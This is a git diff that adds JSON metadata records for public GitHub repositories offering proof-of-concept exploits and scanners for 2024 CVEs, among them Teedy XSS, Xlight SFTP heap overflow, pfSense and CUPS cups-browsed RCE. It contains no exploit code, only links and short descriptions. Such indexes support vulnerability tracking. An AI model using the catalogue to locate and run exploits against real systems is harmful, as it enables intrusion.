diff --git a/2024/CVE-2024-46278.json b/2024/CVE-2024-46278.json new file mode 100644 index 0000000000..86dc1ad722 --- /dev/null +++ b/2024/CVE-2024-46278.json @@ -0,0 +1,33 @@ +[ + { + "id": 848587631, + "name": "CVE-2024-46278-teedy_1.11_account-takeover", + "full_name": "ayato-shitomi\/CVE-2024-46278-teedy_1.11_account-takeover", + "owner": { + "login": "ayato-shitomi", + "id": 74812891, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74812891?v=4", + "html_url": "https:\/\/github.com\/ayato-shitomi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ayato-shitomi\/CVE-2024-46278-teedy_1.11_account-takeover", + "description": "【Teedy 1.11】Account Takeover via XSS", + "fork": false, + "created_at": "2024-08-28T03:17:37Z", + "updated_at": "2025-01-03T04:07:24Z", + "pushed_at": "2024-10-06T09:31:03Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-46310.json b/2024/CVE-2024-46310.json new file mode 100644 index 0000000000..5dad6a58b9 --- /dev/null +++ b/2024/CVE-2024-46310.json @@ -0,0 +1,33 @@ +[ + { + "id": 848997153, + "name": "CVE-2024-46310", + "full_name": "PRX5Y\/CVE-2024-46310", + "owner": { + "login": "PRX5Y", + "id": 35628281, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35628281?v=4", + "html_url": "https:\/\/github.com\/PRX5Y", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PRX5Y\/CVE-2024-46310", + "description": "POC for CVE-2024-46310 For FXServer version's v9601 and prior, Incorrect Access Control in FXServer version's v9601 and prior, for CFX.re FiveM, allows unauthenticated users to modify and read userdata via exposed api endpoint", + "fork": false, + "created_at": "2024-08-28T19:36:52Z", + "updated_at": "2025-01-01T22:30:32Z", + "pushed_at": "2024-10-07T13:09:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-46377.json b/2024/CVE-2024-46377.json new file mode 100644 index 0000000000..d3259453f6 --- /dev/null +++ b/2024/CVE-2024-46377.json @@ -0,0 +1,33 @@ +[ + { + "id": 861516451, + "name": "CVE-2024-46377", + "full_name": "vidura2\/CVE-2024-46377", + "owner": { + "login": "vidura2", + "id": 71623511, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71623511?v=4", + "html_url": "https:\/\/github.com\/vidura2", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vidura2\/CVE-2024-46377", + "description": null, + "fork": false, + "created_at": "2024-09-23T03:47:36Z", + "updated_at": "2024-10-13T04:50:31Z", + "pushed_at": "2024-09-23T03:51:05Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-46383.json b/2024/CVE-2024-46383.json new file mode 100644 index 0000000000..bd3781fd8f --- /dev/null +++ b/2024/CVE-2024-46383.json @@ -0,0 +1,33 @@ +[ + { + "id": 863868784, + "name": "Sensitive-Information-disclosure-via-SPI-flash-firmware-for-Hathway-router-CVE-2024-46383", + "full_name": "nitinronge91\/Sensitive-Information-disclosure-via-SPI-flash-firmware-for-Hathway-router-CVE-2024-46383", + "owner": { + "login": "nitinronge91", + "id": 101330376, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101330376?v=4", + "html_url": "https:\/\/github.com\/nitinronge91", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nitinronge91\/Sensitive-Information-disclosure-via-SPI-flash-firmware-for-Hathway-router-CVE-2024-46383", + "description": "CVE-2024-46383", + "fork": false, + "created_at": "2024-09-27T04:19:42Z", + "updated_at": "2024-11-14T10:28:43Z", + "pushed_at": "2024-11-14T10:19:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-46451.json b/2024/CVE-2024-46451.json new file mode 100644 index 0000000000..87831d9da0 --- /dev/null +++ b/2024/CVE-2024-46451.json @@ -0,0 +1,33 @@ +[ + { + "id": 861304942, + "name": "CVE-2024-46451", + "full_name": "vidura2\/CVE-2024-46451", + "owner": { + "login": "vidura2", + "id": 71623511, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71623511?v=4", + "html_url": "https:\/\/github.com\/vidura2", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vidura2\/CVE-2024-46451", + "description": null, + "fork": false, + "created_at": "2024-09-22T14:47:57Z", + "updated_at": "2024-10-13T04:50:32Z", + "pushed_at": "2024-09-23T03:46:37Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-46483.json b/2024/CVE-2024-46483.json new file mode 100644 index 0000000000..448173df85 --- /dev/null +++ b/2024/CVE-2024-46483.json @@ -0,0 +1,33 @@ +[ + { + "id": 874747179, + "name": "cve-2024-46483", + "full_name": "kn32\/cve-2024-46483", + "owner": { + "login": "kn32", + "id": 105210950, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105210950?v=4", + "html_url": "https:\/\/github.com\/kn32", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kn32\/cve-2024-46483", + "description": "Pre-Authentication Heap Overflow in Xlight SFTP server <= 3.9.4.2", + "fork": false, + "created_at": "2024-10-18T11:46:14Z", + "updated_at": "2024-12-04T22:39:12Z", + "pushed_at": "2024-10-18T12:29:36Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-46532.json b/2024/CVE-2024-46532.json new file mode 100644 index 0000000000..a10af43e20 --- /dev/null +++ b/2024/CVE-2024-46532.json @@ -0,0 +1,33 @@ +[ + { + "id": 864126030, + "name": "CVE-2024-46532", + "full_name": "KamenRiderDarker\/CVE-2024-46532", + "owner": { + "login": "KamenRiderDarker", + "id": 62374874, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62374874?v=4", + "html_url": "https:\/\/github.com\/KamenRiderDarker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KamenRiderDarker\/CVE-2024-46532", + "description": "Reproduction of SQL Injection Vulnerabilities in OpenHIS", + "fork": false, + "created_at": "2024-09-27T14:39:54Z", + "updated_at": "2024-10-14T07:55:43Z", + "pushed_at": "2024-10-14T07:55:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-46538.json b/2024/CVE-2024-46538.json new file mode 100644 index 0000000000..cca5fa8818 --- /dev/null +++ b/2024/CVE-2024-46538.json @@ -0,0 +1,74 @@ +[ + { + "id": 877250777, + "name": "CVE-2024-46538", + "full_name": "EQSTLab\/CVE-2024-46538", + "owner": { + "login": "EQSTLab", + "id": 148991397, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148991397?v=4", + "html_url": "https:\/\/github.com\/EQSTLab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EQSTLab\/CVE-2024-46538", + "description": "Proof-of-Concept for CVE-2024-46538", + "fork": false, + "created_at": "2024-10-23T10:50:01Z", + "updated_at": "2024-12-07T06:28:36Z", + "pushed_at": "2024-11-06T10:56:41Z", + "stargazers_count": 47, + "watchers_count": 47, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-46538", + "exploit", + "pfsense", + "php", + "poc", + "proof-of-concept", + "security", + "vulnerability" + ], + "visibility": "public", + "forks": 9, + "watchers": 47, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 898555204, + "name": "CVE-2024-46538", + "full_name": "LauLeysen\/CVE-2024-46538", + "owner": { + "login": "LauLeysen", + "id": 54813361, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54813361?v=4", + "html_url": "https:\/\/github.com\/LauLeysen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LauLeysen\/CVE-2024-46538", + "description": "based on [EQSTLab](https:\/\/github.com\/EQSTLab)", + "fork": false, + "created_at": "2024-12-04T15:51:40Z", + "updated_at": "2024-12-16T14:03:29Z", + "pushed_at": "2024-12-04T16:00:45Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-46542.json b/2024/CVE-2024-46542.json new file mode 100644 index 0000000000..e2104db43c --- /dev/null +++ b/2024/CVE-2024-46542.json @@ -0,0 +1,33 @@ +[ + { + "id": 910002853, + "name": "CVE-2024-46542", + "full_name": "MarioTesoro\/CVE-2024-46542", + "owner": { + "login": "MarioTesoro", + "id": 62204045, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62204045?v=4", + "html_url": "https:\/\/github.com\/MarioTesoro", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MarioTesoro\/CVE-2024-46542", + "description": null, + "fork": false, + "created_at": "2024-12-30T08:58:05Z", + "updated_at": "2024-12-31T12:17:30Z", + "pushed_at": "2024-12-31T12:17:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-46627.json b/2024/CVE-2024-46627.json new file mode 100644 index 0000000000..a5805836ae --- /dev/null +++ b/2024/CVE-2024-46627.json @@ -0,0 +1,33 @@ +[ + { + "id": 862873525, + "name": "CVE-2024-46627", + "full_name": "d4lyw\/CVE-2024-46627", + "owner": { + "login": "d4lyw", + "id": 53091736, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53091736?v=4", + "html_url": "https:\/\/github.com\/d4lyw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d4lyw\/CVE-2024-46627", + "description": "CVE-2024-46627 - Incorrect access control in BECN DATAGERRY v2.2 allows attackers to > execute arbitrary commands via crafted web requests.", + "fork": false, + "created_at": "2024-09-25T10:32:53Z", + "updated_at": "2024-09-25T10:52:13Z", + "pushed_at": "2024-09-25T10:52:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-46635.json b/2024/CVE-2024-46635.json new file mode 100644 index 0000000000..d0bfafa52e --- /dev/null +++ b/2024/CVE-2024-46635.json @@ -0,0 +1,33 @@ +[ + { + "id": 865729500, + "name": "CVE-2024-46635", + "full_name": "h1thub\/CVE-2024-46635", + "owner": { + "login": "h1thub", + "id": 167607208, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/167607208?v=4", + "html_url": "https:\/\/github.com\/h1thub", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/h1thub\/CVE-2024-46635", + "description": null, + "fork": false, + "created_at": "2024-10-01T03:07:04Z", + "updated_at": "2024-11-11T08:25:02Z", + "pushed_at": "2024-10-01T17:59:04Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-46658.json b/2024/CVE-2024-46658.json new file mode 100644 index 0000000000..1752e0bce5 --- /dev/null +++ b/2024/CVE-2024-46658.json @@ -0,0 +1,33 @@ +[ + { + "id": 867076537, + "name": "CVE-2024-46658", + "full_name": "jackalkarlos\/CVE-2024-46658", + "owner": { + "login": "jackalkarlos", + "id": 88983987, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88983987?v=4", + "html_url": "https:\/\/github.com\/jackalkarlos", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jackalkarlos\/CVE-2024-46658", + "description": "Syrotech SY-GOPON-8OLT-L3 v1.6.0_240629", + "fork": false, + "created_at": "2024-10-03T12:12:23Z", + "updated_at": "2024-10-03T23:30:13Z", + "pushed_at": "2024-10-03T14:19:05Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-46901.json b/2024/CVE-2024-46901.json new file mode 100644 index 0000000000..aefab5f1be --- /dev/null +++ b/2024/CVE-2024-46901.json @@ -0,0 +1,33 @@ +[ + { + "id": 871204333, + "name": "CVE-2024-46901", + "full_name": "devhaozi\/CVE-2024-46901", + "owner": { + "login": "devhaozi", + "id": 115467771, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115467771?v=4", + "html_url": "https:\/\/github.com\/devhaozi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/devhaozi\/CVE-2024-46901", + "description": "Subversion CVE-2024-46901 PoC", + "fork": false, + "created_at": "2024-10-11T13:28:55Z", + "updated_at": "2024-10-11T13:31:52Z", + "pushed_at": "2024-10-11T13:31:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-46982.json b/2024/CVE-2024-46982.json new file mode 100644 index 0000000000..58219734e6 --- /dev/null +++ b/2024/CVE-2024-46982.json @@ -0,0 +1,33 @@ +[ + { + "id": 903309507, + "name": "next_js_poisoning", + "full_name": "CodePontiff\/next_js_poisoning", + "owner": { + "login": "CodePontiff", + "id": 45843121, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45843121?v=4", + "html_url": "https:\/\/github.com\/CodePontiff", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CodePontiff\/next_js_poisoning", + "description": " The CVE-2024-46982 is cache poisoning of next_js some site have API to load their image", + "fork": false, + "created_at": "2024-12-14T09:14:01Z", + "updated_at": "2024-12-14T09:43:01Z", + "pushed_at": "2024-12-14T09:42:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-46986.json b/2024/CVE-2024-46986.json new file mode 100644 index 0000000000..f5f9e97439 --- /dev/null +++ b/2024/CVE-2024-46986.json @@ -0,0 +1,33 @@ +[ + { + "id": 861297912, + "name": "CVE-2024-46986", + "full_name": "vidura2\/CVE-2024-46986", + "owner": { + "login": "vidura2", + "id": 71623511, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71623511?v=4", + "html_url": "https:\/\/github.com\/vidura2", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vidura2\/CVE-2024-46986", + "description": null, + "fork": false, + "created_at": "2024-09-22T14:27:35Z", + "updated_at": "2024-10-13T04:50:35Z", + "pushed_at": "2024-09-22T14:34:12Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-4701.json b/2024/CVE-2024-4701.json new file mode 100644 index 0000000000..71d6a28a69 --- /dev/null +++ b/2024/CVE-2024-4701.json @@ -0,0 +1,33 @@ +[ + { + "id": 799940832, + "name": "CVE-2024-4701-POC", + "full_name": "JoeBeeton\/CVE-2024-4701-POC", + "owner": { + "login": "JoeBeeton", + "id": 11488268, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11488268?v=4", + "html_url": "https:\/\/github.com\/JoeBeeton", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JoeBeeton\/CVE-2024-4701-POC", + "description": "POC for CVE-2024-4701", + "fork": false, + "created_at": "2024-05-13T11:58:19Z", + "updated_at": "2024-08-19T22:21:38Z", + "pushed_at": "2024-05-13T12:56:08Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-47062.json b/2024/CVE-2024-47062.json new file mode 100644 index 0000000000..5bdff83b49 --- /dev/null +++ b/2024/CVE-2024-47062.json @@ -0,0 +1,33 @@ +[ + { + "id": 886019978, + "name": "CVE-2024-47062", + "full_name": "saisathvik1\/CVE-2024-47062", + "owner": { + "login": "saisathvik1", + "id": 51957422, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51957422?v=4", + "html_url": "https:\/\/github.com\/saisathvik1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/saisathvik1\/CVE-2024-47062", + "description": "CVE-2024-47062 PoC", + "fork": false, + "created_at": "2024-11-10T01:10:06Z", + "updated_at": "2024-12-06T03:49:02Z", + "pushed_at": "2024-12-06T03:48:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-47066.json b/2024/CVE-2024-47066.json new file mode 100644 index 0000000000..5972ea1fb1 --- /dev/null +++ b/2024/CVE-2024-47066.json @@ -0,0 +1,38 @@ +[ + { + "id": 862261516, + "name": "CVE-2024-47066", + "full_name": "l8BL\/CVE-2024-47066", + "owner": { + "login": "l8BL", + "id": 151047781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/151047781?v=4", + "html_url": "https:\/\/github.com\/l8BL", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/l8BL\/CVE-2024-47066", + "description": "Proof-of-Concept for CVE-2024-47066", + "fork": false, + "created_at": "2024-09-24T09:59:27Z", + "updated_at": "2024-11-20T16:31:05Z", + "pushed_at": "2024-09-24T15:35:56Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "poc", + "security", + "vulnerability" + ], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-47076.json b/2024/CVE-2024-47076.json new file mode 100644 index 0000000000..5568b90570 --- /dev/null +++ b/2024/CVE-2024-47076.json @@ -0,0 +1,33 @@ +[ + { + "id": 864938618, + "name": "CVE-2024-47076", + "full_name": "mutkus\/CVE-2024-47076", + "owner": { + "login": "mutkus", + "id": 4324026, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4324026?v=4", + "html_url": "https:\/\/github.com\/mutkus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mutkus\/CVE-2024-47076", + "description": "Linux ve Unix sistemlerinizin CVE-2024-47076 açığından etkilenip etkilenmediğini bu script ile öğrenebilirsiniz.", + "fork": false, + "created_at": "2024-09-29T15:13:58Z", + "updated_at": "2024-09-29T15:29:52Z", + "pushed_at": "2024-09-29T15:29:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-47138.json b/2024/CVE-2024-47138.json new file mode 100644 index 0000000000..319df14115 --- /dev/null +++ b/2024/CVE-2024-47138.json @@ -0,0 +1,33 @@ +[ + { + "id": 912092069, + "name": "CVE-2024-47138", + "full_name": "wilguard\/CVE-2024-47138", + "owner": { + "login": "wilguard", + "id": 189017838, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/189017838?v=4", + "html_url": "https:\/\/github.com\/wilguard", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wilguard\/CVE-2024-47138", + "description": "CVE-2024-47138: Missing Authentication for Critical Function (CWE-306)", + "fork": false, + "created_at": "2025-01-04T15:27:32Z", + "updated_at": "2025-01-04T17:02:05Z", + "pushed_at": "2025-01-04T15:35:20Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-47176.json b/2024/CVE-2024-47176.json new file mode 100644 index 0000000000..ce6ce14b71 --- /dev/null +++ b/2024/CVE-2024-47176.json @@ -0,0 +1,419 @@ +[ + { + "id": 863821082, + "name": "spill", + "full_name": "GO0dspeed\/spill", + "owner": { + "login": "GO0dspeed", + "id": 45773339, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45773339?v=4", + "html_url": "https:\/\/github.com\/GO0dspeed", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GO0dspeed\/spill", + "description": "POC scanner for CVE-2024-47176", + "fork": false, + "created_at": "2024-09-27T01:22:43Z", + "updated_at": "2024-10-15T16:00:15Z", + "pushed_at": "2024-10-07T19:07:54Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 864227050, + "name": "CVE-2024-47176", + "full_name": "workabhiwin09\/CVE-2024-47176", + "owner": { + "login": "workabhiwin09", + "id": 31949319, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31949319?v=4", + "html_url": "https:\/\/github.com\/workabhiwin09", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/workabhiwin09\/CVE-2024-47176", + "description": "CUPS Browsd Check_CVE-2024-47176", + "fork": false, + "created_at": "2024-09-27T18:23:16Z", + "updated_at": "2024-09-27T18:43:29Z", + "pushed_at": "2024-09-27T18:43:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 864262917, + "name": "CVE-2024-47176-Scanner", + "full_name": "tonyarris\/CVE-2024-47176-Scanner", + "owner": { + "login": "tonyarris", + "id": 58807068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58807068?v=4", + "html_url": "https:\/\/github.com\/tonyarris", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tonyarris\/CVE-2024-47176-Scanner", + "description": "Scanner for the CUPS vulnerability CVE-2024-47176", + "fork": false, + "created_at": "2024-09-27T20:04:21Z", + "updated_at": "2024-09-27T20:09:21Z", + "pushed_at": "2024-09-27T20:09:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 864586309, + "name": "CVE-2024-47176", + "full_name": "mr-r3b00t\/CVE-2024-47176", + "owner": { + "login": "mr-r3b00t", + "id": 14963690, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14963690?v=4", + "html_url": "https:\/\/github.com\/mr-r3b00t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mr-r3b00t\/CVE-2024-47176", + "description": "Scanner", + "fork": false, + "created_at": "2024-09-28T16:02:41Z", + "updated_at": "2024-09-30T07:58:40Z", + "pushed_at": "2024-09-30T06:19:59Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 864641800, + "name": "CVE-2024-47176", + "full_name": "aytackalinci\/CVE-2024-47176", + "owner": { + "login": "aytackalinci", + "id": 80779474, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80779474?v=4", + "html_url": "https:\/\/github.com\/aytackalinci", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aytackalinci\/CVE-2024-47176", + "description": "Vulnerability Scanner for CUPS: CVE-2024-47176", + "fork": false, + "created_at": "2024-09-28T19:01:31Z", + "updated_at": "2024-12-31T00:00:16Z", + "pushed_at": "2024-09-28T19:35:53Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 864823983, + "name": "jugular", + "full_name": "lkarlslund\/jugular", + "owner": { + "login": "lkarlslund", + "id": 8929787, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8929787?v=4", + "html_url": "https:\/\/github.com\/lkarlslund", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lkarlslund\/jugular", + "description": "Ultrafast CUPS-browsed scanner (CVE-2024-47176)", + "fork": false, + "created_at": "2024-09-29T09:05:30Z", + "updated_at": "2024-11-20T16:31:06Z", + "pushed_at": "2024-10-07T19:24:35Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cups", + "cve-2024-47076", + "cve-2024-47175", + "cve-2024-47176", + "cve-2024-47177" + ], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 864993211, + "name": "CVE-2024-47176", + "full_name": "nma-io\/CVE-2024-47176", + "owner": { + "login": "nma-io", + "id": 9916363, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9916363?v=4", + "html_url": "https:\/\/github.com\/nma-io", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nma-io\/CVE-2024-47176", + "description": "A simple CVE-2024-47176 (cups_browsed) check tool written in go. ", + "fork": false, + "created_at": "2024-09-29T17:53:50Z", + "updated_at": "2024-09-29T17:55:45Z", + "pushed_at": "2024-09-29T17:55:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 867190495, + "name": "CVE-2024-47176", + "full_name": "l0n3m4n\/CVE-2024-47176", + "owner": { + "login": "l0n3m4n", + "id": 143868630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/143868630?v=4", + "html_url": "https:\/\/github.com\/l0n3m4n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/l0n3m4n\/CVE-2024-47176", + "description": "Unauthenticated RCE on cups-browsed (exploit and nuclei template)", + "fork": false, + "created_at": "2024-10-03T15:53:04Z", + "updated_at": "2024-12-30T08:42:46Z", + "pushed_at": "2024-10-03T17:11:17Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + 